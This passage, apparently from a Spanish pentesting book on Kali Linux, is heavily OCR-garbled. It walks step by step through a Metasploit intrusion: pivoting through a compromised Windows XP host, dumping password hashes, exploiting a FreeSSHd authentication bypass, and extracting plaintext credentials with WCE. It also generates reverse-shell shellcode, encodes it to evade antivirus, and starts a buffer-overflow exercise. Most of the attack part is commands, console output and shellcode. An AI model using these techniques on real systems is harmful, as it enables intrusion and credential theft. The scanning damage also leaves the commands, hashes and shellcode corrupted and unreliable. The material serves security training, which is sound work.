red  102. 1 68. 1,0/24  y  otro  en  la  red  10.0.0.0/8,  ademAs  del  adaptador  local  o  de  loopback . 

Interface  2 

Name  :  Adaptador  Ethernet  PCI  AMO  PCNET  Family  -  Mini puerto  del  adm  trust  re dor  de  paquetes 

Hardware  MAC  :  08:0S:27:b7:f2:0B 

ITU  :  1500 

:Pv4  Address  :  192, 16B. 1.40 

IPv4  Netmask  ;  255,255.255.0 

Interface  3 

Name  :  Adaptador  Ethernet  PCI  AMD  PCNET  Family  #7  -  Minipuerto  del  admimst rador  de  paquetes 

Hardware  MAC  :  08 :0@ ;27 : f6 :7a :d6 

MTU  :  1500 

IPv4  Address  :  10,3,0.1 

IPv4  Nstmask  :  255 .0.0.0 _ _ 

Imagen  04. 13:  Configuracum  de  ted  de  la  maquina  XP 


En  esie  instante  se  debe  configurar  una  ruta  interna  en  Metasploit  para  poder  tener conectividad  con 
las  maquinas  de  la  red  10.0*0.0/8  a  traves  de  la  sesion  con  id  I ,  que  es  la  que  se  acaba  de  crear  con 
explotacion. 


Se  puede  utilizar  d  script  automute  en  la  sesion  de  Meterpreter  o  tambien  es  posible  utilizar  el 
Ll*mando  route  de  Metasploit  tal  y  como  se  puede  visualizar  en  la  imagen  04.14  de  la  siguiente 


paging. 


Pentesting  con  Kali 


mete rp ret 3.r  >  background 


[*]  Backgrounding  session  1... 

Ml  exploit  (msQB  06/  tap  l)  >  route  add  10,0,0*0  255.0.0.0  1 
I  V)  Rout  e  added 

ms 1  exploit (msOB  06/  netctpi)  >  route  print 
Active  Routing  Table 


Subnet 

10*0.0.0 


Netmask 
255.0 .0.0 


Gateway 
Session  1 


msf  exploit [ms08_Ob/  netapi)  >  \ 


Imogen  f4. 14:  C onfigurarion  de  pivoting 


Antes  de  explorar  la  red  1 0.0. 0.0/8  se  debe  obteneiv  o  sntentar  conseguir,  informacion  importante  eon 
la  que  se  pueda  volver  a  entrar  al  equipo  sin  neeesidad  de  explotar  ninguna  vulnerabilidad.  Se  podrta 
haeer  persistence  a  A feterpreter,  pero  esto  es  invasive  y  los  AVs  podrian  detectarlo  rapidamente 
Por  esta  razori  se  decide  realizar  un  hashdump  o  voleado  de  hashes  del  equipo  vulnerado.  Con 
esia  informacion  se  podria  volver  al  equipo  a  trines  del  modulo  expto tt/n indows/sm b/psexec  t 
impersonalizar  al  usuario. 


mf  exploit ( Oh/  nptapi)  >  sessions  -1  1 
!  I  Starting  interaction  with  1 ,  * . 

frmterp rater  >  getuid 

Server  username:  NT  AUTHOR IT Y\SVST£M 

met^  prater  >  hashdump 

Administ  rado r : 5GG :87351 72c3s/7dZc6aad3b435b51404ge :512b99009997c3b55B8c3fac9c0ae969  :  : : 
Asistente  de  ayuda: lG00;317dd0337ea2d549dcG743cd?ee77792:elecIbc58If420f3ae9570442879965d: : : 
Invitado :501 :aad3b435b514G4QG3ad3b435bSl404ee:31d6cfe0d}6ae931b73c59d7e0c0e9c0; : : 
pspg : 1003: 87351 72c3a77d2c6aad3b435b51404eG :5i2b990O9997c3b5588cafac9c0ae969: : : 
SUPR0RT_388945a8 : 1002 : aad3b435b51 404eeaad3b435b51404ee : 3cb0da961c4308978ebcc944SQ725954 : : ; 
metsrpreter  >  | _ 

I  mage n  04. 1 5:  Voleado  de  hashes. 


Una  vez  realizado  el  voleado  de  hashes  de  usuario  de  la  maquina  XP  se  utifiza  a  esta  como  puente 
para  llegar  a  la  red  10*0.0*0/8  y  realizar  un  escaneo  sobre  dieha  red,  De  este  modo,  se  pueden 
descubrir  que  maquinas  se  eneuentran  en  dieha  red*  de  algun  modo  "ocultas”  o  sin  conectividad  a  la 
maquina  del  pent  ester. 


Se  uliliza  el  modulo  awdtiaryf$canner/port$canftcp  para  “barrer"  la  red  10.0.0,0/8,  cortfigurando  un 
rang(V  de  puertos  bajo.  De  esta  manera  se  eonsigue  descubrir  maquinas  rapidamente,  aunque  otra 
forma  es  configurar  puertos  tipicos  en  redes  empresariales,  como  puede  ser  el  SMB*  Una  vez  que 
se  han  descubierto  las  nuevas  maquinas  se  deberia  realizar  un  analisis  exhaustive  de  los  servieios  y 
vers i ones  de  estas. 


Como  se  puede  visual  izar  en  la  siguiente  imagen  se  ha  obtenido  una  nueva  maquina,  a  priori, 
desconocida  por  d pentester.  La  nueva  maquina  liene  como  di  reccioti  IP  1 0.0.0.2  y  aparte  de  disponer 
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rnnitulo  IV-  Explication 


los  puertos  tipicos  135,139  y  445,  tiene  e!  puerto  22  a  la  escucha.  ^Es  un  equipo  UNIX?  El  puerto 
^  ()(.  defecto  corresponderia  con  un  servidor  SSH,  muy  comim  en  dichos  sistemas  operative* *  y 
no  tanto  en  sistemas  Windows.  Por  otro  lado,  los  puertos  anteriores  son  mis  comunes  de  sistemas 
fPiWfor.v  que  UNIX. 

[*]  Backgrounding  session  1... 

pisf  exploit ( 067  netapi)  >  use  auxiliary/scanner/portscan/tcp 
[ftsf.  auxiliary! ttp}  >  set  RHOSTS  10,0.0.0/24 
GHOSTS  =>  10.0.0  .0/24 

auxiliary (tcp)  >  set  PORTS  29-500 
PORTS  =>  20-500 
msf  auxiliary  ( tcp)  >  run 

h 

Hb’  [*]  10.6.0.1.:135  -  TCP  OPEN 

(-]  10.0.0.1:139  -  TCP  OPEN 

(*J  10.0.0.1:445  -  TCP  OPEN 

[*]  10.0.0.2:22  -  TCP  OPEN 

[*]  10.0.0.2:139  -  TCP  OPEN 

t*]  10.6.0.2:135  -  TCP  OPEN 

■"  It*]  10,6.0.2:445  -  TCP  OPEN _ _ I 

Imagen  04.16:  Deacubrimiento  de  In  mdquina  Windows  7. 

II  siguientc  paso  es  verificar  que  si  sterna  operative  y  para  el  lo  se  util  iza  de  nuevo  el  modulo  auxiliary t 
scarmer/smb/smb _versian.  La  configuraeion  es  sencilla.  solo  hace  faltar  indicar  el  equipo  remote  y 
lanzar  el  mddulo.  El  resultado  ohtenido  es  que  el  sistema  operativo  es  una  maquina  Windows  7, 
obteniendo  ademas  el  nombre  de  la  maquina  y  el  dominio  a)  que  pertenece. 

Bff  auxiliary  (Up)  >  usa  auxiliary /aeaimr/amb/imb  jfor&ion 
nai  auxiliary ( smfo  version)  >  sat  RHOSTS  10. IS .0.2 
RHOSTS  =-  13.0.0, 2 
Eli  auxiliary t»*  version)  >  run 

ri  10.0,3, 2:445  is  running  Windows  7  Ultimate  (Build  7630)  (language:  Unknown]  (nam«:PRAC  ICASt'-Pt]  ( domain 

K GROUP) 

[-'I  Scanned  1  of  1  hosts  (10(3%  complete) 

[’J  Auxiliary  module  execution  completed 

msf  auxiliary (smb  version)  >  [ _  . 

Imagen  04. 1 7:  Dcscubriimento  dc  sistema  operativo. 


Ahoraya  se  sabe  que  es  una  maquina  Windows  7 con  el  puerto  22  a  la  escucha.  [lay  que  verificar  que 
ese  puerto  22  se  trata  dc  un  servicio  del  protocolo  SSH  e  intentar  obtener  el  maximo  de  in  form ac ion 
sobre  elto.  Las  aplicaciones  que  implementan  el  protocolo  SSH  en  sistemas  Windows  suelen  ser 
herramientas  de  nivel  medio,  es  decir,  con  poco  soporte  o  actual  izadas  en  periodos  de  liempo 
largo,  Este  hecho  puede  provocar  que  existan  vutoerabilidades  y  exploits  sobre  ellas  que  ayuden  al 
pen  tester  a  entrar  en  sistemas  que  de  otra  forma  no  podria. 

Para  investigar  mas  sobre  el  protocolo  SSI  1  dc  la  m&quina  Windows  7  sc  utiliza  el  modulo  auxiliary/ 
scamer/s$k/$sh  version.  Iras  configurar  el  modulo  se  obtiene  informacidn,  que  cn  un  principio, 
puede  resultar  exirafla.  Se  obtiene  que  cl  protocolo  es  L\%sh - 2, 0- weon lydo  2.1,3  ,  el  cual  puede 
extrabar  al  pentester  por  su  desconocinriento,  El  pentester  puede  encontrarse  en  un  punto  de 
desconocimiento  o  de  inflexion,  por  cllo  se  apoyara  cn  Internet  para  descubrir  mas  sobre  dicho 
protocolo.  s 


t 


I 
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Rente  sting  con  Kali 


BS-f  auxiliary  (smb  version)  >  us  a  auxiliary  /scann«r/ssh/ssh_ve  rsion 

ml  auxiliary version)  >  set  RHOSTS  10,0,0.2 

GHOSTS  =>  10,0,0.2 

HSi  auxiliary($sh  version)  >  run 

1*1  10.0.0.2:22,  SSH  server  versions  S5H-2.0  WeOnlyDo  2.1,3 
I 'I  Scanned  1  of  1  hosts  (1G0%  complete) 

1*1  Auxiliary  module  execution  completed 
ESl  auxniaryfssh  version)  >  | _ 

Imagen  04, 1 8:  Descubrimiento  de  version  deE  protocol o  SSH. 


Se  busca  information  en  Google  sobre  ssh-2.0-\veonlydo  2.1.3’'  y  se  utiliza  adernas  otras 
posibilidades  como  “ssh-2.0- weonlydo  2.1.3  exploit  \  Google  puede  arrajar  sorpresas  en  sus 
busquedas,  no  hay  mas  que  entender  et  funcionamiento  de  Google  Hacking.  En  este  case,  se  obtiene 
information  sobre  un  Oday  y  d  codigo  del  exploit  para  llevar  a  cabo  la  exploration  mediante 
Metasploit 


ssh-2,0  weonlydo  2,1 ,3  exploit 


Wob  liTiagenfei  Mops  Shopping 


Aprasrmjif[<i  r«ni&  699  revultadot  (0.32  iti.jutwJc*) 


Heramierrtas  de  bu&queda 


F  reeSSHDRemote  Au  then. totigp  bypass  fttrodax.  Expl®* 
www.expiolt-dd  oom/*xplott«/23  ..  -Estado&  Undo*  Traducif  este  pAgina 
02/12/2012  FneoSSHD  Remain'  Authenfrcatrcjn  Bypass  2oroday  Exploit banner  of 
Ihe  most  mwnt  veralon  Is:  SBH-Z.QWvQnlyDo  2,0  For  your  pleasure,  ... 

Freesahfl  Aulhenticaton  Bypass 

www.®x  plait -db  com/ex  pi  oits/24,,.  -  E&t&dos  Unices  -  Traducir  esia  pdgma 
15/01/201 3i  -  The  exploit  has  been  tested  wflth  both  password  and  public  key 
authentic  abon.  ...  disowned  rf  banner  *-  SSf4-2.0'WeOniyOo/  version-banner.  spfrtf 
■)(1) ...  if  version  --  /(2.1 .3{2.0  6y  return  Exploit. :  Chech  Code:  .Appears  end  ... 


hnagcn  04. 19:  F.ncontrar  exploit  y  aplicacion  para  el  protocolo  SSH. 


Una  vez  que  se  ha  encontrado  un  exploit  y  que  se  ha  visto  que  el  protocolo  anterior  es  utilizado  por 
una  herramienta  denominada  FreeSStld.  se  busca  modi  ante  e!  coman  do  search  en  Metasploit  para 
comprobar  que  se  dispone  de  dicho  exploit  ya  agregado  en  el  framework.  Adernas,  se  comprueha 
que  hasta  la  version  L2.6  de  FreeSSHd  este  exploit  es  exitoso,  y  la  sorpresa  del  pen  tester  es  mayor 
cuando  en  el  sitio  web  original  de  la  aplicacion  sc  comprueba  que  la  ultima  version  disponible  es 
precisamente  la  1.2.6.  Por  lo  tanto  ;es  un  Odayl 


1  ras  en  lender  que  la  maquina  Windows  7  es  vulnerable  gracias  a  una  aplieaeidn  de  terceros  instalada 
en  el  fa,  el  pmtester  configura  el  modulo  que  provocara  tomar  el  control  de  la  maquina  remota 
a  naves  del  pi  vote  que  proporeiona  la  maquina  XR  La  configuration  del  modulo  es  send  Ha,  se 
dispone  de  un  paranietro  denominado  USERNAME  que  indiea  una  iista  de  nombres  de  usuario  con 
los  que  estos  generalmente  se  pueden  loguear  en  la  aplicacion.  El pentester  debera  intioducir  los  mas 


comunes  ya  que  de  esa  suertc  dependera  el  exito  del  ataque.  Ademas,  existe  otro  parametro  en  el  que 
se  puede  proportion  a  r  un  listado  de  usuarios  en  un  fichcro. 
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Capiiulo  IV  Explotacion 


Bfii  #uk]1  d  r> T islip_ * ^ r  I orrl  w  use  Exploit  iVinoniM/»ih/rrwE*i-d_flL.i  hbypaisfl 

I15.t  Exploit  (rrrry*hd  i-  anon1  net con* 

■ 

^pdui#  Qpt  i  anm  1  w  x  p  l  &  1  r  /v  '■  nap*#  /#*LV  f  rsMina  ag  i  Ptoyoass  > : 

N«m«  Curvfnt  S«  UP* 

Kagu:  rid 

Deverlfirinn 

iworr 

HPonr  j? 

u:i(  IWAltf 

UStlt^k  ILF  7Qfrt7moTj«plaiT7flp|3#7firfl.7Bi^ f3/ii«ta/w0ndUH,*7iHif>Mi4iiari,T*T 

one  o-ar  line 

y» 

¥« 

yfrs 

Tn*  i*rnai  ottil.'dEN 
tii#  t«rg«i  oort 

A  g»#m#^  Lo  try 

Fl\»  coniaining  u#«m#H0pp 

Id  Mar* 

0  Fr&pMhtl  1.2,6  /  rt:nSows  (Universal} 

as Koloit IfTBCKtiti  agLtiby^iws)  >  s&t  141037  IS.fl-.a.J 

FWDS1  =>  J0 .0.0.2 

[7^ f  «tp\0jT||treea5iN  authh-jpass)  >  seL  USETIN4PI  ivdiT. i  n:  se  rador 

LSE3Ni^E  =>  (tHmLnt*trSdcir 

C£.f  asploll  ( f|7t*s^W  anthhypass)  >  sc-t  PAYLOAD  MindowS/fMterprstar/ti-trpiijtep 

PA^OAQ  =»  wi-ndcws/r^irereroTCf/blra  tea 
rrsf  nplut  [tiK5Slid_lutli|i^i«fi] 

Iroageu  04,20;  Conltguracion  del  modulo  del  exploit  para  el  Oday. 


Una  vez  configurado  el  modulo  sc  procede  a  la  explotacion  de  la  maquina  remota  mediante  el  uso 
del  comando  exploit,  El  payload  configurado  fue  un  Meterpreter  de  tipo  hind  que  proporciona  una 
consola  de  este,  Una  vez  que  se  consigue  la  sesion  bind  de  Meterpreter  sc  puede  obt^ner  de  nuevo 
mis  informacion  en  la  maquina  remota,  Es  important©  siempre  ir  reeopilando  nuevos  usuarios  y  el 
mayor  numero  de  informacion  respeeto  a  las  raaquinas  disponibles  desde  esta. 

iJJtf  *Xt>l0Lt[fr«<!*5tiEl_«i4thhT(t«s>  ►  «xp\0 1 " 

!  *  I  S«n«r  ome  hand  lor 

|‘|i  Trying  unmam  ,aiJsirUft't-addr 

[~|  Uploading  D^yioad,  \tvia  may  take  B«v*iral  im , . . 

t-i  Sanding  »t*ga  (752120  by las) 

[-1  Hatarpretfir  leasion  2  DU-ansd  ( 192,155,1 .37-192/168.1  48 :0  -»  10.0.0,2:4444]  2013-0-3 -2b  0l.Wl51  J-lS-3 0B 

ItttEftEttai  p  gatuld 

*e  rve  r  use  r name :  S*J|  p  rac  t  it  ssFCXAdmim st  ratm  r  ■  0k  70  7?Si  63  7469635  3  7  Je72d504 35c  4 1 646d696069?37  *726 1 646 f  72 

"etarprciai  >  1 


lmagen  04.21:  Explotacion  de  la  aplicadon  FreeSSHd  en  Windows  7. 


Aoteriormenie  se  comentaba  que  se  podria  ohtener  informacion  sensible  de  I  os  equipos  donde  se  este 
entrando.  Esto  realmente  es  asi.  ya  que  todos  los  inicios  de  sesion  quedan  cacheados  en  el  sistema, 
codificados  en  ba$e64,  con  fo  que  todo  ello  conlleva.  For  lo  que,  con  las  herramientas  adecuadas, 
se  puede  obtener  informacion  sensible,  eomo  conirasenas  de  usuario  de  Windows  en  texto  piano. 

* .  w 

Para  realizar  esta  accion  se  uiilizara  la  herramienta  Windows  Credential  Editor,  En  primer  lugar  se 
debera  subir  el  EXE  a  la  maquina  Windows  7  donde  despues  se  ej  ecu  turn.  Puede  que  los  AVs  detecten 
diulia  herramienta,  por  lo  que  una  buena  solution  es  deshabi  litar  el  AV  o  encodear  e!  ej  ecu  table  para 
dejarlo  in^etectable.  Otra  herramienta  que  podria  llevar  a  cabo  esta  accion  es  Mimikatz, 


ift  a  fp  to  far  *  upload  /  fo-ot/wco,s*o  c:\\ 

1*1  uploading  *  /rpqt/wc«. frira  >  c:\ 

|*|  uploaded  £  /rpot/wc«,BX4  -*  c ; Wwcs.dxe 

Process  292  crutad. 

Chennai  3  c rent ad .  * 

iLcnosaft  windows  [VerBiiri  6,1.760fl] 

^og^riQht  fcj  ^GB9  Microsoft  Corporation,  ResaryadoB  todos  las  daroehos. 

Imogen  04.22:  Su^itla  de  WCE  a  Izi  maquina  Windows  7. 
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Pentesting  eon  Kali 


La  ejecueion  y  obtencion  de  credenciales  cacheadas  en  piano  se  realiza  a  traves  de  la  shell  remote 
que  proporciona  Metepmer.  Los  admin istradores  de  sistemas  suelen  llevar  malas  practicas,  coma 
im  uso  indebido  del  admin istrador  del  dominie,  e!  cuaJ  puede  quedar  cacheado  y  ser  descubierto  por 
un  pentester  en  cualquier  equipo  cliente  o  servidor.  I’or  esta  razon,  y  ya  que  no  exisle  una  solut  ion 
fdcil.  los  admin  istradores  deben  evadir  la  utilization  de  dichas  credenciales  siempre  y  cuando  sea 
posible. 

AH 

«CE  vi. abate  CWincrowa  Credential*  Editor)  .  ( t)  29lfi P2an  ,Z*12  Amplla  Security  - 
by  He  man  Dchpa  nrir^flUipliasecur^ty  .com) 

Jse  h  for  help. 

Adminls  L  r  adDnpi"ai;  t  teas*  -  PC :  0735 1 72C3A7/D2C&AA3 1941505. 1 404FE :  5 1 20990099970395508 

C:\wce>wtB  w 
itce  -w 

hCE  Vi  ujWta  |  Windows  Credentials  Edlt&ri  -  [c]  2010 ,201 1  >2012  Jtmplis  Security  - 
^  by  Honw'  Qchei  [heman$amplia5fH:Ljnty,ta?*i 

Jse  -h  for  help, 

A  dm  ; n : 5t  rada  r\prac  c least -P0 : lzlabc . 

PRAC  T I  CAS# - P0$  VWORKGROUP : 1 23efrt . 

Imagen  04,23:  Obtencidn  de  credenciales  en  ie\lc>  piano. 

Proof  Of  Concept:  Exploiting  e  ingenieiia  inverse 

En  esm  prueba  de  concept©  se  van  a  traiar  temas  de  exploiting  e  ingen ieria  inversa.  Es  interesante 
eonoecr  ciertas  herramientas  que  pueden  ayudar  a  ver  este,  (siempre  dificil ),  tema.  Metasphit,  como 
se  ha  mcncionado,  dispone  de  varias  herramientas  que  ayudan  a; 

-  Entender  el  fixncionamiento  de  los  aplicativos. 

Desensamblar  binaries* 

-  Analizar  el  cadi  go  y  posi  clones  de  memoria. 

-  Visualizar  protect i ones  que  puedan  tener  los  binaries, 

Estudiar  el  EIP  y  su  offset.  Jj 

En  primer  lugar  se  hablara  de  msjpayload,  una  de  las  herramientas  esirella  del  framework.  Con  esta 
herramienta  de  linea  de  comandos  se  puede  generar  codigo  ej  ecu  table  personal  izado,  en  distintos 
lenguajes  como  puede  ser  C,  Peri  JavaScript  o  Ruby.  La  sintaxis  de  la  herramienta  es  realmente 
intuitiva  y  sencilla.  como  se  puede  observer  en  !a  siguiente  linea  msfpavioad [VARIABLES,  LHOST 
LPORT,  PAYLOAD]  <modo>.  1 

# 

Los  modes  de  msfpayloati  son; 

■m 

Mode  summary  o  S,  presenta  informacidn  sob  re  el  payload  que  se  quiere  ulilizar, 

Mode  C,  R,  J,  P.  ( icnera  las  shellcodes  en  lenguaje  C,  Ruby,  JavaScript  y  Perl. 

El  modo  R  o  raw.  Permite  obtener  codigo  en  lenguaje  mdquina. 

-  El  modo  X  o  ejecu  table,  Permite  obtener  un  ejecutable  de  Windows  con  la  sheltcode 
empaquetada  en  el  EXE. 


/ 


#  mifpayload  windows/ shall  rovorso  tcp  lhost»19J,  J6fl .  S,  Iporl  -4444  C 

/' 

-  windows /shctl  l  t  r«varm»_icp  9H  bytes 

*  http; //www  m«T tt«p\oJ.tTcom 

-  VERBOSE" falsa,  LHQST*  192, 168,0 <45,  LPURI  4444, 

*  ftay*r#aConn,actFl<H  rias-'b.,  HavBrB.oAUswH’rsxyMiAse, 

*  PropondMjgra!o*f  il«n,  EilTJ=UNC^pnK**t . 

*  J  r i :  l  i  nl  Aut  oRun$c  ript  =  „  ALHOftihSe  eipt- 
*/ 

unsigned  ehor  bufEJ  » 

■\Xft  YXoS\*B9  \  xG8\  *M\  xB0  \  x  6B\  x  B9  \  *e5\  x  3 1  \*d2\  x64\.x  Bb\x 52Y*30 " 

*86  \  *  S7\ *&c  \xBfe\  *S2\x  U\xBb\*72\  r  2  9 YxG  f  \xb7\x  £*\x2B  \  *3 1  \x  t  f " 

" \x3 1\ kO\uc \x3c  VxGl\x?c\ xG2\  x2c\x23\  xc  1  \  xc  f \wBd\  *01  \  xc  7Yxa2 " 

*' \x  f  9\  x52\x$7  \  x@t>\x  52\*  1 9\  xStA *42\  s3t  Yk0  1  \  *  &3\  *Bb\*4  70\  *85 " 

" S  xc  0\  x7  4\x  4a  \x0  1  \x-d0  Yx50 VxBtA*  4  SV*  1  a\*8b  \*E  fl\  *  2®\ *9 1  V id3\xe3 " 

*‘\x3t  \  *49\ s  Bb  \  *34\  xteVifll V*  ei6\*3 1  \  i  f  f  \*3  l\xefi\  xac  Y#e  1\  xe  f\*Sd " 

■  \x9 1 V KC  7\ X 3H \ xeG\ X  75\*  f 4 \ sG 3\x  7d\x f 9\x 3b Yx 7d\x24\x73\ xe 2\ x58 " 
"\xfib\x5S\x24YxQl\xd3\x66\xSb\x0c\x4o\x8b\x5B\xlc\x91\xd3\xeb " 

'\x04\xSb\x0 1  \xtiD\x  BS  Vx4  4\ x24\x2.4\ x  5D\x 5b  \X61  \  xb9\xbia \ vh  1  \x  f  F " 
\xaa\x58\x5f\xSo\xab\lcl2\xeb\xa6\x5d\k6B\jt33\x32\xe0\i0e\i68" 

31  lx  77  \  *7  3\ x32  \ *5  f \ x  54 \  x58\x4t  \  *  1  7\ *26\  *07 \ i J  f\ *d5\*  dB  »90\ xB  1 " 

"  \x0B\x00  Y*29\xc4\ *  54  Y*50  \  x66\  *29\*  9  3\xSb \x50\x  f  f\x  d5 \x59\  x59 " 

■■  \ *  5fl\  x  40  \  x50\x  4G  \  x50\  x6S\x  aa\xB  f  \  x  d  f  \  x*0\ x  f  f  \x  d5  \  xB9\xc  7 " 

1  Vx60 \xz BY* fl9\xUG\x 2c\ x60\ xQ 2\xQQ\  k 1 1 \x5c \ *89\ xb6\ x6a\ x 1 Q\ " 
,,\x57\x6B\x99\xa5Yx74\x61  \x  f  f  \xd5Vx68\x63\x6d\  x  64  \x0Q\x89  Yxe3 " 

IxSJ  VK57\*£7\>i31\xf6\  xSaVxl  ?\x59\x&5\xa2\x  fd\  x6fi\xt  7\x44\x24 " 
"\x3c\xai\x01\xfld\x44\x24\i(10\xc6\xO9\x44\x54\K53\x56Vx56\x56 " 

"  V  x  46-\  >:5  6\  x  4e  \  x56\ x  5£\>  53\x  SG\ x  60  \  x7  &\x  c  e  \x  3  f ' \  x96\  x  f  f  V  xctS\xfi9 " 

1  \x  60  Vx4  e\x  56 \xA  6\  x  f  f \  x  30  \  *6  B\  x  09  VxB7\ x  1  d\x6S\ x  f  f\  xd5  Vxbt>\ x  f  a " 
^,^xTs5\xa2\x56^xfiB^xa6\x95^xbd\x9d^y1Lnxd5\*3c^x06\I7c\x0a^xfl(S,, 

"  \x  f  b \xo  B\  x  75  \  xC5\ *bb\*47\*13\X  ?2  Vx6  f  \  a  6a\aOB  \  x53U  f  f  \xOS  - ; _ 


Imogen  1^4.24:  Generic  ion  de  una  shell  code  con  msfpayioad. 


Por  otro  lado  existe  una  herramienta  muy  interesame  coma  cs  msfem-ode^  que  permits  ofuscar 
las  sheik-odes  con  el  ohjetivo  de  evadir  los  AVs  e  IDS,  La  simaxis  es  similar  a  msjpaytoad,  y  en 
general  a  las  herramientas  que  tienen  que  ver  con  she! (codes  en  Metasphit,  Bn  la  imagen  se  puede 
\  isuali/ar  im  ejemplo,  donde  msfpuyload  genera  una  shed  code  personali/ada  o  cusiomizada  y  se  le 
pasa  a  msfencode  el  flujo  de  bytes  para  que  este  los  encode  para  lograr  la  evasion  de  los  sistemas  de 
proteccidn, 

rootfirowt?  --#  s&tp^y^bad  windaws/iseterpretEr/ reverse  tcp  lhDsl=197  068 . 1, 39  lport=4444  r  f  isfenco 
flle  -t  exe  'X  /root/pptty.exe  -e  xSfi/shikata  ga  nal  -k  -c  5  -o  pultyCodi Cicada rexe 
f*]  xBfi/shjkata  ga  nai  succeeded  with  sire  317  Oteration^lJ 

J“j  xSfe/shihata  ga  rial  succeeded  with  size  344  (iteration=2ji 

(*]  xBti/shikata  ga  nai  succeeded  with  size  371  (iteration^) 

{*3  xBfi/shikata  qa  nai  succeeded  with  size  398  liieratiori=4) 

1*3  xafi/shikata  ga  nai  succeeded  with  size  47S  f iterations) 

Imagen  04.25:  Generation  de  una shelicodey  encod&ida. 


Otra  aplicacidn  interesante  y  que  junta  las  dos  fiindonalidades  comentadas  anteriormente  es 
rmfirenom.  Una  mejora  que  los  usuarios  no  tienen  en  cuenta  en  la  mayona  de  las  ocas i ones  es 
*a  svmautica  de  los  parametros*  Hs  mas  sencillo  ulilizar  una  herramienta  cuyos  parametros  tienen 
SemAnticat  eomo  por  ejemplo  el  caso  del  par&metro  -p*  En  esta  herramienta  se  puede  ulilizar  un 
l^rdmeiro  semantico,  es  dec  i  r,  —payload.  De  esia  man  era,  el  usuario  puede  entender  ficilmentc  la 
*tcionalidad  que  la  herramienta  presents 

J  sfvertom  permite  crear payloads  para  utilizar  de  forma  independiente  en  los  exploits  que  eualquier 
Llsuario  puede  crear,  o  se  puede  utilizar  para  crear  archives  ejecutables  para  sistemas  operativos 
CQtno  ti'mdmvs,  GNU/Linia  u  OSX. 


/ 
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Pentesting  con  Kali 


Rn  la  ruta  /usr/s hare/metasploi t-fr amework/tools  se  pueden  eneonirar  herramientas  utilizables  en 
Ins  proccsos  de  mgcnieria  inverse  y  que  pueden  ayudar  al  usuaria  a  averiguar  informacion  inil  ^ 
)os  bmarios.  A  continuaci6n  se  va  a  detallar  un  ejemplo  con  cod i go  en  lenguaje  C  con  et  que  sc 

Litilizaran  distintas  herramientas  de  Metasploii  y  de  la  propia  distribucidn  de  Kali  Linux .  El  eddico 
es  el  siguiente:  T 


♦include  <stdllb.h> 

# include  <unistd*h> 

♦include  <stdio,h> 

♦include  <string,h>  t 

void  premio  £ ) 
i 

print  f  ( "El  flu  jo  de  cddigo  ha  side  modificado\n")  ; 

} 

int  main (int  arge,  char  ^*argv) 

{ 

char  buffer [64]; 
gets (buffer) ; 

1 


E!  codigo  anter  ior  si  m piemen ic  pide  por  teclado  un  valor,  como  se  puede  visualizar  se  dispone  de  un 
buffer  At  64  caracteres  para  almacenar  en  memoria.  ^Como  se  pueden  modificar  los  valores  internes 

dc  la  memoria  para  lograr  que  la  funcibn /?«?»»«>  se  ejecute?  ;,Es  posible?  Conociendo  la  distribucibn 
de  la  memoria.  la  respuesta  es  si.  jS 

Es  importanie  fijarse  en  la  instruction  void  premio  (rya  que  la  direccibn  de  memoria  dotide  se 
ubique  dehera  sci  ejeculada  en  algiin  momenta  por  el  EIP.  registro  de  siguiente  instruction  a 

ejecutar.  En  el  flujo  normal  de  la  apiicacion  nunca  se  ejecutara  dicha  funcion,  por  ello  ha  bra  que 
estudiar  como  conseguirlo. 


Antes  de  buscar  la  direccibn  de  memoria  de  la  funcion  premio .  se  puede  obtener  el  valor  del  registro 
EIP  otorgando  a  la  apiicacion  un  valor  de  entiada  mas  grande  que  la  cantidad  de  caracteres  que 
soporta  cl  buffer.  Se  ha  elegido  crear  un  patron  de  200  caracteres.  y  mediante  el  uso  del  debugger 
gdh  se  lanza  la  apiicacion  provocando  el  fallo  y  la  obtencibn  del  valor  del  registro  EIP. 

rDotikdl  i  /usr/shara/metasplbit-rt^e^rtt/tools/pflttBrn  cfoata.  rb  2GS 

A  flGAfl  1  Aa2Aa3Aa  4  A  a5A  a6  A  a  7  A  30  Aa  9  A  bG  Ab  1  Ab  2Ao3Ab4  A&h  AbGA  b  7.4bGA  b9A  c  OAc  L  Ac  7  Ac  3  Ac  4  Ac  5  Ac 

6Ac  7AcaAcSAd0Atf]  Ad2Ad3Ad44d(>Ad6Ad7A{3aAiiSAp0AelAe2Ae3Ae4AoEiA86Ae7Ae9Ao‘lAf0AflAf2A 
f3A  f 4 Af 5Af6A  f 7A  f 8A f9Ag0Agl Ag2Ag3Ag4Ag5Ag 
rcatgfcal  J  :  -ft  gdb  --quiet  ,7poc 

Reading  symbols  from  /raot/poc . . . (nn  oebuggJng  symbols  found J . , . done 
(gdb)  run 

Starting  program:  /noot/poc 

AaQ  A0 ] A  *  ? A  a  3A a4  Aa5  A*6  Ah 7 AaH As9 AbGAfc | Ab2Ab3Ab4  A&5 AbftA  b  7AfiGAb9Ac  0 Ac  1  Ac  2 Ac 3A  c A  Ac  SA  c 

Me  7Ac  fl  Ac  9  Ad0  A  a  1 A  d  ?A  d  3A  d4  A  05  AdS  Aej7  AcrB  AtJ9A  a  0A  a  1  Aa2Aa3  Ae4  5  Ao6  Aa  7  A  aiA  e9A  #  0A  f  1 A  f  2  A 

f3A  f4A  ftA  fGA  f  7  A  fBAf&*gWgU&2A(3Ag4g5Ag 

*lgnaT  SI0SEOT,  Sagmantetlon  tmlt .  ^ 

Imngen  04.26;  Oblcnci6n  del  valor  del  RIP. 


In  a  vtv  que  se  dispone  del  valor  del  EIP  y  de  un  debug  provocando  la  caida  de  la  apiicacion  sc 
debe  obtener  cl  offset  del  EIP,  La  direccion  de  retomo  se  podria  pensar  que  esta  juslamente  despues 
del  buffer  de  64  caracteres,  pero  por  lo  general  no  es  asi,  ya  que  se  pueden  encontrar  bytes  nulos,  y 
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fqpinilo  I V.  Explotaci 


on 


{ros  antes  de  la  direction  de  retorno.  Sc  utilizara  la  aplicacidn pattern  offset  que  proporciona 
ugtasploit  tal  y  como  sc  puede  aprecian  en  la  imagen. 

rootgkaU:-#  /usr/sharo/jnotasp’lolt  -  framework/ tool  s/pat  tern  of  fSfct  *  rb  0x63413563^ 

[*]  Exact  march  at  offset  76 

rpQtjkali ; M _ _ _ 

Imagen  04*27;  Obtencidrt  del  offset  de  caracteres. 


Una  vez  sc  ha  oblenido  que  el  valor  cs  de  76  bytes  de  offset ,  sc  debera  buscar  la  direction  de  memoria 
a  ja  qUe  sc  pretcnde  que  la  aplicacion  sake  para  modificar  el  flujo  del  programa.  Con  la  aplicacidn 
